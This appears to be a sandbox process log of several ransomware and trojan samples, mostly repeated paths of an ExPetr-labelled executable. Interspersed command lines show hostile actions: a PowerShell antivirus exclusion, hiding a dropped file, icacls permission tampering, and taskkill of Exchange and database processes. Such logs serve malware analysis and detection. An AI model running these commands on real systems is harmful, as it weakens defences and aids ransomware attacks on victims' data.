C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe

HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" runas

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe

HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Local\Temp\fake.exe

"C:\Users\Admin\AppData\Local\Temp\fake.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\fake.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe

HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Program Files (x86)\gjcsw\dwiu.exe

"C:\Program Files (x86)\gjcsw\dwiu.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f2dae117-221c-42dd-a511-f6e11a6a70d0" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Microsoft.Exchange

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM MSExchange

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlserver.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe"

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe

Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe

C:\Windows\system32\icacls.exe

icacls "C:\Users\Admin\AppData\Roaming" /grant Everyone:(OI)(CI)F /T

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

